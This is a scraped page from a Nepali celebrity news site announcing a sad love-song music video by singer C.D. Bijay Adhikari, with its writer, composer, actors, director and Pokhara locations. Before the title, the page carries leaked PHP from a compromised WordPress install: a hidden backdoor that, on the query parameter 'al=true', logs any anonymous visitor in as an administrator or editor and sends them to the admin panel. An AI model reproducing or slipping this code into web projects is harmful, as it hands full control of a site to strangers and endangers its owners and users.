// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); मेरो मुटु जलाएर तिम्रो भाग्य सेकाउनु सोधी हाले दुनियाँले मेरै गल्ति देखाउनु (भिडियो) | Celebrity Nepal

मेरो मुटु जलाएर तिम्रो भाग्य सेकाउनु सोधी हाले दुनियाँले मेरै गल्ति देखाउनु (भिडियो)


सेलिब्रेटी नेपाल काठमाडौँ
sristi-irish
नेपाली सुगम संगीतमा पछिल्लो पुस्तामा लोकप्रिय बन्दै गई रहेका गायक सी.डी.बिजय अधिकारीको आवाजमा रहेको नयाँ गीतको भिडियो सार्बजनिक भएको छ । माया प्रेममा बिछोडको भावनाले भरिएको गीत लाइ वियोगान्त कथामा नै भिडियो लाइ प्रस्तुत गरिएको छ। मेरो मुटु जलाएर तिम्रो भाग्य सेकाउनु सोधी हाले दुनियाँले मेरै गल्ति देखाउनु..शब्दमा जति गहकिलो छ गायकले त्यति नै मेहनत गरेर गाएका छन् । पदमा लिंसा मगरको शब्द र राजेश थापाको संगीत रहेको गीतको भिडियोमा कृष्ण पौडेल,इरिश घिमिरे र श्रृष्टी गौतमको अभिनय रहेको छ । कृष्ण पौडेलले निर्देशन गरेको भिडियोमा एउटा पिडित केटाको मर्म लाइ देखाउन खोजिएको छ । पोखराको रमणीय दृश्यहरु लाइ भिडियोमा कैद गरिएको छ ।

सेलिब्रिटी नेपाल.कम

सूचना तथा प्रसारण विभाग दर्ता नम्बर ५३७ – २०७३ / ०७४

संचालक / प्रकाशक: कल्पना सापकोटा
सम्पादक: आनन्द अधिकारी
समाचार प्रमुख: रघुनाथ सापकोटा
सम्पर्क:
call/whatsapp: +977 9851071873 | email: celebritynepal@gmail.com

Supported by Glamour Nepal | Shopping Partner: Kavya Online Store

Copyright © 2012 - 2026 | All Right Reserved.